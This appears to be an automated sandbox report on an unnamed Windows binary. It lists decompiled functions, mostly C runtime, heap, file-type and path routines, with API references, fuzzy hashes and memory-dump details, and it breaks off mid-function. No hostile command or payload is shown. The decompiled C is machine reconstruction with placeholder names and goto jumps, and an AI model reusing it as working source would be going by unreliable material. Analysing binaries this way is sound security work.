Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherItemUser
String ID:
API String ID: 4250310104-0
Opcode ID: 26a264e3c0b7c383bde7dc4ab5db9d06e1aac6c8883fcc9cc865da7416c5924c
Instruction ID: 7294a392f1bd9c0acb4fbd19c6901e07b52b9034b1702f68898b7d7d48ad3e8c
Opcode Fuzzy Hash: 26a264e3c0b7c383bde7dc4ab5db9d06e1aac6c8883fcc9cc865da7416c5924c
Instruction Fuzzy Hash: 97C04C76508240FFCB515BA19D08C2FBFA9AB94311F40C959B5A980130C6368421DB37

Uniqueness

Uniqueness Score: -1.00%

Function 00420AD9, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420AD9(int _a4) {

				E00420AAE(_a4);
				ExitProcess(_a4);
			}

0x00420ae1
0x00420aea

APIs

___crtCorExitProcess.LIBCMT ref: 00420AE1

Part of subcall function 00420AAE: GetModuleHandleW.KERNEL32(mscoree.dll,?,00420AE6,00000000,?,0041C8A7,000000FF,0000001E,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018), ref: 00420AB8
Part of subcall function 00420AAE: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00420AC8

ExitProcess.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 6b2c5d67c070b5d7e0a62b945a5e383f719d5869347cd4c5ffa797d6b7d11b0e
Instruction ID: 5e4a28fed3007be349de5fc8293830f8a6cab4b3dff0e79aaf44313a0ee51824
Opcode Fuzzy Hash: 6b2c5d67c070b5d7e0a62b945a5e383f719d5869347cd4c5ffa797d6b7d11b0e
Instruction Fuzzy Hash: 74B09B31100108BFCB116F12DC098593F65DB91360B914025F94805071DF719DA2D589

Uniqueness

Uniqueness Score: -1.00%

Function 004176B3, Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004176B3(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t28;
				signed int _t30;
				void* _t33;
				void* _t34;
				signed int _t41;
				signed int _t48;
				signed int _t53;
				intOrPtr _t54;
				void* _t55;
				void* _t75;
				signed int _t78;
				void* _t80;
				intOrPtr* _t85;
				void* _t87;

				_t75 = __edx;
				E00419DD4(E004293FA, _t87);
				_t85 = __ecx + 4;
				 *((intOrPtr*)(_t87 - 0x10)) = __ecx;
				_t28 = E004094F9(_t85);
				_t30 =  *(_t85 + 4) + 8;
				_t78 = _t28 >> 8;
				_t53 = 7;
				 *_t85 =  *_t85 + (_t30 >> 3);
				 *(_t87 - 0x14) = _t78;
				_t80 = (_t78 & _t53) + 1;
				 *(_t85 + 4) = _t30 & _t53;
				if(_t80 != _t53) {
					__eflags = _t80 - 8;
					if(_t80 != 8) {
						L5:
						E00401306(_t87 - 0x24, _t80);
						_t54 = 0;
						 *((intOrPtr*)(_t87 - 4)) = 0;
						if(_t80 <= 0) {
							L10:
							_t33 = E004162C9( *((intOrPtr*)(_t87 - 0x10)), _t75,  *(_t87 - 0x14),  *(_t87 - 0x24), _t80); // executed
							_t100 =  *(_t87 - 0x24);
							_t55 = _t33;
							if( *(_t87 - 0x24) != 0) {
								_push( *(_t87 - 0x24));
								E00419DFE(_t55, _t80, _t85, _t100);
							}
							_t34 = _t55;
							L13:
							 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
							return _t34;
						} else {
							goto L6;
						}
						do {
							L6:
							_t65 =  *((intOrPtr*)(_t87 - 0x10));
							if( *_t85 >=  *((intOrPtr*)( *((intOrPtr*)(_t87 - 0x10)) + 0x78)) - 1 && E00411E9F(_t54, _t65, _t75) == 0) {
								_t13 = _t80 - 1; // -1
								if(_t54 < _t13) {
									__eflags =  *(_t87 - 0x24);
									if(__eflags != 0) {
										_push( *(_t87 - 0x24));
										E00419DFE(_t54, _t80, _t85, __eflags);
									}
									_t34 = 0;
									goto L13;
								}
							}
							 *((char*)( *(_t87 - 0x24) + _t54)) = E004094F9(_t85) >> 8;
							_t41 =  *(_t85 + 4) + 8;
							 *_t85 =  *_t85 + (_t41 >> 3);
							_t54 = _t54 + 1;
							 *(_t85 + 4) = _t41 & 0x00000007;
						} while (_t54 < _t80);
						goto L10;
					}
					_t80 = E004094F9(_t85);
					_t48 =  *(_t85 + 4) + 0x10;
					__eflags = _t48;
					L4:
					 *_t85 =  *_t85 + (_t48 >> 3);
					 *(_t85 + 4) = _t48 & _t53;
					goto L5;
				}
				_t80 = (E004094F9(_t85) >> 8) + _t53;
				_t48 =  *(_t85 + 4) + 8;
				goto L4;
			}

0x004176b3
0x004176b8
0x004176c2
0x004176c5
0x004176cb
0x004176d5
0x004176d8
0x004176df
0x004176e3
0x004176e5
0x004176ec
0x004176ed
0x004176f2
0x0041770a
0x0041770d
0x0041772a
0x0041772e
0x00417733
0x00417737
0x0041773a
0x0041777f
0x00417789
0x0041778e
0x00417792
0x00417794
0x00417796
0x00417799
0x0041779e
0x0041779f
0x004177a1
0x004177a7
0x004177af
0x00000000
0x00000000
0x00000000
0x0041773c
0x0041773c
0x0041773c
0x00417745
0x00417750
0x00417755
0x004177b0
0x004177b4
0x004177b6
0x004177b9
0x004177be
0x004177bf
0x00000000
0x004177bf
0x00417755
0x00417764
0x0041776a
0x00417772
0x00417777
0x0041777a
0x0041777a
0x00000000
0x0041773c
0x00417716
0x0041771b
0x0041771b
0x0041771e
0x00417723
0x00417727
0x00000000
0x00417727
0x00417703
0x00417705
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004176B8

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 171a032caa9134e319aaf1e58785ecedf290ff23edc28343bd48b9e639d94b33
Instruction ID: 93e53dfe1557df951ea61887c6f88d58437acb37eb1f8212571c0a6725a2cb9c
Opcode Fuzzy Hash: 171a032caa9134e319aaf1e58785ecedf290ff23edc28343bd48b9e639d94b33
Instruction Fuzzy Hash: F531C572A042058BCB14DF69D9926EDB3F1EF85308F24442FD456E7381DB39AD81C768

Uniqueness

Uniqueness Score: -1.00%

Function 004090CB, Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004090CB(void* __ebx, void* __ecx, void* __edi, signed short* _a4, char _a8) {
				signed int _v8;
				char _v4104;
				signed int _t28;
				signed int _t38;
				char _t40;
				signed int _t49;
				WCHAR* _t51;
				void* _t52;
				void* _t53;

				E0041A3E0(0x1004);
				_t51 = _a4;
				if(_t51 == 0 ||  *_t51 == 0) {
					__eflags = 0;
					return 0;
				} else {
					_v8 = _v8 & 0x00000000;
					_t40 = 1;
					_a4 = _t51;
					do {
						_t49 = _v8 >> 1;
						if(_t49 >= 0x800) {
							break;
						}
						if(E00409DC6( *_a4 & 0x0000ffff) != 0 && (_a4 != _t51 + 4 ||  *((short*)(_t51 + 2)) != 0x3a)) {
							E0041C2C1( &_v4104, _t51, _t49);
							_t53 = _t53 + 0xc;
							 *((short*)(_t52 + _t49 * 2 - 0x1004)) = 0;
							_t38 = E0040904A( &_v4104, 1, 0); // executed
							asm("sbb bl, bl");
							_t40 =  ~_t38 + 1;
						}
						_a4 =  &(_a4[1]);
						_v8 = _v8 + 2;
					} while ( *_a4 != 0);
					_t63 = _a8;
					if(_a8 == 0 && E00409DC6( *(E00409D8B(_t63, _t51)) & 0x0000ffff) == 0) {
						_t28 = E0040904A(_t51, 1, 0); // executed
						asm("sbb bl, bl");
						_t40 =  ~_t28 + 1;
					}
					return _t40;
				}
			}

0x004090d3
0x004090d9
0x004090de
0x00409199
0x00000000
0x004090ee
0x004090ee
0x004090f3
0x004090f5
0x004090f9
0x004090fc
0x00409104
0x00000000
0x00000000
0x00409114
0x0040912e
0x00409133
0x00409139
0x0040914a
0x00409153
0x00409155
0x00409155
0x00409157
0x0040915e
0x00409162
0x00409168
0x0040916d
0x00409187
0x00409190
0x00409192
0x00409192
0x00000000
0x00409196

APIs

_wcsncpy.LIBCMT ref: 0040912E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: 5d50e04a522778b96d8da2c11b319e206298a19a91b5b48ba6b3635937596b4f
Instruction ID: 80d5427943c400758b4a2468ffd41020bc803d68d851720de881002f78c70ab6
Opcode Fuzzy Hash: 5d50e04a522778b96d8da2c11b319e206298a19a91b5b48ba6b3635937596b4f
Instruction Fuzzy Hash: 4121D471B40315AAEF20AB65C846BDA33A89F02704F00806BF944BB2C2D2BC9D85C798

Uniqueness

Uniqueness Score: -1.00%

Function 00415133, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00415133(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
				void* __esi;
				intOrPtr _t26;
				void* _t39;
				intOrPtr _t61;
				void* _t63;

				_t59 = __edi;
				_t42 = __ebx;
				E00419DD4(E004293E8, _t63);
				_push(__ecx);
				_t61 = __ecx;
				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
				 *(_t63 - 4) = 0xa;
				E00414E0E(__ecx);
				_t26 =  *((intOrPtr*)(__ecx + 0x4b34));
				_t67 = _t26;
				if(_t26 != 0) {
					_push(_t26); // executed
					E00419DFE(__ebx, __edi, __ecx, _t67); // executed
				}
				E00410DB4(_t42, _t63,  *((intOrPtr*)(_t61 + 0x14)));
				_push( *((intOrPtr*)(_t61 + 0x20)));
				E0041C30B(_t42, _t59, _t61, _t67);
				_t45 =  *((intOrPtr*)(_t61 + 0x18));
				_t68 =  *((intOrPtr*)(_t61 + 0x18));
				if( *((intOrPtr*)(_t61 + 0x18)) != 0) {
					E0041392E(_t45, _t59, _t63, 3);
				}
				E00401105(_t61 + 0xe6e0);
				E00401105(_t61 + 0xe6d0);
				E00401105(_t61 + 0xe6c0);
				 *(_t63 - 4) = 6;
				E004094C3(_t61 + 0xe6b0);
				 *(_t63 - 4) = 5;
				E0040A7F3(_t61 + 0xe678, _t68);
				E00411B2D(_t61 + 0xe35c);
				E0041205E(_t61 + 0x4b38);
				E00401105(_t61 + 0x44);
				E00401105(_t61 + 0x34);
				E00401105(_t61 + 0x24);
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				_t39 = E004094C3(_t61 + 4);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t39;
			}

0x00415133
0x00415133
0x00415138
0x0041513d
0x0041513f
0x00415141
0x00415144
0x0041514b
0x00415150
0x00415156
0x00415158
0x0041515a
0x0041515b
0x00415160
0x00415164
0x00415169
0x0041516c
0x00415172
0x00415175
0x00415177
0x0041517b
0x0041517b
0x00415186
0x00415191
0x0041519c
0x004151a7
0x004151ab
0x004151b6
0x004151ba
0x004151c5
0x004151d0
0x004151d8
0x004151e0
0x004151e8
0x004151ed
0x004151f4
0x004151fd
0x00415205

APIs

__EH_prolog.LIBCMT ref: 00415138

Part of subcall function 00419DFE: __lock.LIBCMT ref: 00419E1C
Part of subcall function 00419DFE: ___sbh_find_block.LIBCMT ref: 00419E27
Part of subcall function 00419DFE: ___sbh_free_block.LIBCMT ref: 00419E36
Part of subcall function 00419DFE: RtlFreeHeap.NTDLL(00000000,00000000,0042D618,0000000C,0041E984,00000000,0042D8F0,0000000C,0041E9BE,00000000,0041A29B,?,00424CE6,00000004,0042DA90,0000000C), ref: 00419E66
Part of subcall function 00419DFE: GetLastError.KERNEL32(?,00424CE6,00000004,0042DA90,0000000C,0042092E,00000000,0041A2AA,00000000,00000000,00000000,?,0041E366,00000001,00000214), ref: 00419E77

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeH_prologHeapLast___sbh_find_block___sbh_free_block__lock
String ID:
API String ID: 2675452811-0
Opcode ID: c7655a9bf4d0ce89e670383b5cd43904c9e024c41db34ef29a04a94e750e60a1
Instruction ID: 66f0969ef784c028030c23be632be64694c215ea0684d772819382004f08faaa
Opcode Fuzzy Hash: c7655a9bf4d0ce89e670383b5cd43904c9e024c41db34ef29a04a94e750e60a1
Instruction Fuzzy Hash: 3C11B430900B10DAC329FF36D952ADAB7E0AF14308F40092FA097675E2DFB87E44CA18

Uniqueness

Uniqueness Score: -1.00%

Function 00408B84, Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B84(intOrPtr* __ecx, void* __edx) {
				void* _t19;
				void* _t23;
				void* _t34;
				void* _t38;

				E00419DD4(E0042927F, _t38);
				E00401188(_t38 - 0x1c, __edx, __ecx);
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				 *((intOrPtr*)( *__ecx + 0xc))();
				_t19 =  *((intOrPtr*)( *__ecx + 0x10))();
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 - 0x1c)))) + 0xc))( *((intOrPtr*)(_t38 - 0x14)),  *((intOrPtr*)(_t38 - 0x10)), 0, 0, 0, 2, _t34, _t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t19;
			}

0x00408b89
0x00408b99
0x00408ba0
0x00408bac
0x00408bb3
0x00408bb9
0x00408bcb
0x00408bd7
0x00408bdf

APIs

__EH_prolog.LIBCMT ref: 00408B89

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ecdac036cd72d34c0fe2ee5816dd2f7b6dbdb2e8f41e791f72ec22e0033d414e
Instruction ID: a24d8019f6983d4e090402eacba868d3dfd03452a26aef07b0cf7c120167eecb
Opcode Fuzzy Hash: ecdac036cd72d34c0fe2ee5816dd2f7b6dbdb2e8f41e791f72ec22e0033d414e
Instruction Fuzzy Hash: 41F04F35B00214AFDB149B58C849BADB7B1EF48724F208599E952B73D1CB749D008B54

Uniqueness

Uniqueness Score: -1.00%

Function 00405497, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00405497(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
				void* _t38;

				E00419DD4(E0042911E, _t38);
				_push(__ecx);
				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
				E00409D27(__ecx, __edi); // executed
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				E00410977(__ecx + 0x92d4);
				 *(_t38 - 4) = 1;
				E00410977(__ecx + 0x9330);
				 *(_t38 - 4) = 2;
				E00410977(__ecx + 0x938c);
				 *(_t38 - 4) = 3;
				E00410977(__ecx + 0x93e8);
				 *(_t38 - 4) = 4;
				E00410977(__ecx + 0x9444);
				 *(_t38 - 4) = 5;
				E0040533C(__ebx, __ecx, __edi,  *(_t38 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return __ecx;
			}

0x0040549c
0x004054a1
0x004054a5
0x004054a8
0x004054ad
0x004054b7
0x004054c2
0x004054c6
0x004054d1
0x004054d5
0x004054e0
0x004054e4
0x004054ef
0x004054f3
0x004054fa
0x004054fe
0x00405509
0x00405511

APIs

__EH_prolog.LIBCMT ref: 0040549C

Part of subcall function 00409D27: __EH_prolog.LIBCMT ref: 00409D2C

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1abe654269f5cf74de6d175dab7bfa8c0002ef819ebefb1d698085f720769188
Instruction ID: dfc8775f1182891661215da053da59e56afa6c2061bbcfe86418fcbc37c1cd03
Opcode Fuzzy Hash: 1abe654269f5cf74de6d175dab7bfa8c0002ef819ebefb1d698085f720769188
Instruction Fuzzy Hash: A1014471911794DAEB15E7A5C1257DDF7E4AF14308F00409EA456632C3CBF81B44CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00409429, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409429(intOrPtr __edx, WCHAR* _a4, intOrPtr _a8) {
				void* _t11;
				intOrPtr _t21;

				_t21 = _a8;
				 *((char*)(_t21 + 0x1044)) = 0;
				if(E00409DA5(_a4) == 0) {
					_t11 = E004091E3(__edx, 0xffffffff, _a4, _t21); // executed
					if(_t11 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t11); // executed
					 *(_t21 + 0x1040) =  *(_t21 + 0x1040) & 0x00000000;
					 *((char*)(_t21 + 0x100c)) = E00408D9D( *((intOrPtr*)(_t21 + 0x1008)));
					 *((char*)(_t21 + 0x100d)) = E00408DB5( *((intOrPtr*)(_t21 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x0040942a
0x00409432
0x00409440
0x0040944d
0x00409455
0x00000000
0x00000000
0x00409459
0x0040945f
0x00409475
0x00409480
0x00000000
0x00409488
0x00409442
0x00000000

APIs

Part of subcall function 00409DA5: _wcspbrk.LIBCMT ref: 00409DB6

FindClose.KERNELBASE(00000000,00000000,?,?,00406B94,?,?,00000000,?,0000003A,00000802), ref: 00409459

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFind_wcspbrk
String ID:
API String ID: 2190230203-0
Opcode ID: 4e5bd6b913cd9413b4c54403dac4b1a7f14a2f4218d8528c5fb809efa2fe458d
Instruction ID: a68b6e7e47b78875f123889400c16c12115c505e8f9bf175e5fe5d6e1920e2ae
Opcode Fuzzy Hash: 4e5bd6b913cd9413b4c54403dac4b1a7f14a2f4218d8528c5fb809efa2fe458d
Instruction Fuzzy Hash: ADF0B435008381AACA215B758804BCB7BA5AF96339F048A1EF1F8731D2C77D1856CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00406E0C, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406E0C(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				void* _t13;
				void* _t16;
				intOrPtr _t24;
				intOrPtr _t27;
				void* _t29;

				E00419DD4(E004291B2, _t29);
				_push(__ecx);
				_t27 = __ecx;
				 *((intOrPtr*)(_t29 - 0x10)) = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 0x3ae0));
				 *(_t29 - 4) = 1;
				_t32 = _t24;
				if(_t24 != 0) {
					E00415133(_t16, _t24, _t24, _t32); // executed
					E00419DF3(_t16, _t24, __ecx, _t32, _t24);
				}
				 *(_t29 - 4) = 0;
				E0040CD93(_t27 + 0x4af4);
				_t6 = _t29 - 4;
				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
				_t13 = E00401000(_t27 + 0x10,  *_t6);
				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
				return _t13;
			}

0x00406e11
0x00406e16
0x00406e18
0x00406e1b
0x00406e1e
0x00406e24
0x00406e2b
0x00406e2d
0x00406e31
0x00406e37
0x00406e3c
0x00406e43
0x00406e47
0x00406e4c
0x00406e4c
0x00406e53
0x00406e5d
0x00406e65

APIs

__EH_prolog.LIBCMT ref: 00406E11

Part of subcall function 00415133: __EH_prolog.LIBCMT ref: 00415138

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0591493bdcb74003514d226bcc38597597e69260e60b8cc133a301924eb600a3
Instruction ID: 403cfe1b485e47d51c29679d08149cc1bca6b9f1c3423f1f392c5db0c3ba0365
Opcode Fuzzy Hash: 0591493bdcb74003514d226bcc38597597e69260e60b8cc133a301924eb600a3
Instruction Fuzzy Hash: C3F0E231500610DBC319EB59D4513EEF7B5EF81318F00062FE062636C0CBB81E058659

Uniqueness

Uniqueness Score: -1.00%

Function 0040948D, Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040948D(void* __ebx, void* __ecx, char _a4) {
				void* __edi;
				intOrPtr _t7;
				void* _t11;
				void* _t12;
				void* _t15;

				_t18 = _a4;
				_t15 = __ecx;
				 *((char*)(__ecx + 8)) = 0;
				if(_a4 == 0) {
					_t4 = __ecx + 0xc;
					 *_t4 =  *(__ecx + 0xc) & 0x00000000;
					__eflags =  *_t4;
				} else {
					_t7 = E004199E2(__ebx, _t11, 0x8003, _t18, 0x8003, _t12); // executed
					 *((intOrPtr*)(_t15 + 0xc)) = _t7;
					E0041A110(0x8003, _t7, 0, 0x8003);
				}
				return _t15;
			}

0x0040948d
0x00409493
0x00409495
0x00409499
0x004094b9
0x004094b9
0x004094b9
0x0040949b
0x004094a2
0x004094ab
0x004094ae
0x004094b6
0x004094c0

APIs

_memset.LIBCMT ref: 004094AE

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 5db7b6d4c1d41d4a3acfb668331e315b7db52372ba373cb3ba16b2eff5f00561
Instruction ID: 4a86d3b0e85643cbeeaa6ebe5e8cf4941e887abd2f178ade1f806177eec34d29
Opcode Fuzzy Hash: 5db7b6d4c1d41d4a3acfb668331e315b7db52372ba373cb3ba16b2eff5f00561
Instruction Fuzzy Hash: B7E0CDB1E087402AD361512D9C05F57A6D84B91724F15C86FF148A32C3C3BC5C418759

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7F7, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E7F7(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x44ed00 = _t6;
				if(_t6 != 0) {
					 *0x4508f4 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0041e80c
0x0041e812
0x0041e819
0x0041e820
0x0041e826
0x0041e81c
0x0041e81c
0x0041e81c

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041E80C

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7f7bbfb17e402f4c4b8df109bea2a7806279f754e3aefd33f463c8021394482b
Instruction ID: 2be6e078503a5376b966dc15376295b5df431c1b89920801c21d29622b5a3473
Opcode Fuzzy Hash: 7f7bbfb17e402f4c4b8df109bea2a7806279f754e3aefd33f463c8021394482b
Instruction Fuzzy Hash: 09D05E7AA903456EDB106F717C08F623BDCA38479AF088836BC1CC6290E674C5518948

Uniqueness

Uniqueness Score: -1.00%

Function 004089D6, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004089D6(void* __ecx) {
				void* _t2;
				long _t3;

				_t2 =  *(__ecx + 4);
				if(_t2 != 0xffffffff) {
					_t3 = GetFileType(_t2); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x004089d6
0x004089dc
0x004089e2
0x004089eb
0x004089f8
0x004089f2
0x004089f4
0x004089f4
0x004089de
0x004089e0
0x004089e0

APIs

GetFileType.KERNELBASE(?,00408A63), ref: 004089E2

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 21be207e81fbf7b630347c0f5662986f7648b7095830319ae40027632c6c0fbb
Instruction ID: 956efa19ec9a989dcb8eba4e399ff14b5343f1885901ef712c9a39a623559049
Opcode Fuzzy Hash: 21be207e81fbf7b630347c0f5662986f7648b7095830319ae40027632c6c0fbb
Instruction Fuzzy Hash: 5FC012B251000052CE2465384A4947B66568743376B684BB5E0A1D15D2CF38CC42B10A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C19A, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041C19A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t9;
				void* _t18;

				_push(0xc);
				_push(0x42d6b8);
				E0041F49C(__ebx, __edi, __esi);
				E00420AF1();
				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
				_t9 = E0041C0AF(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
				 *(_t18 - 4) = 0xfffffffe;
				E0041C1D0();
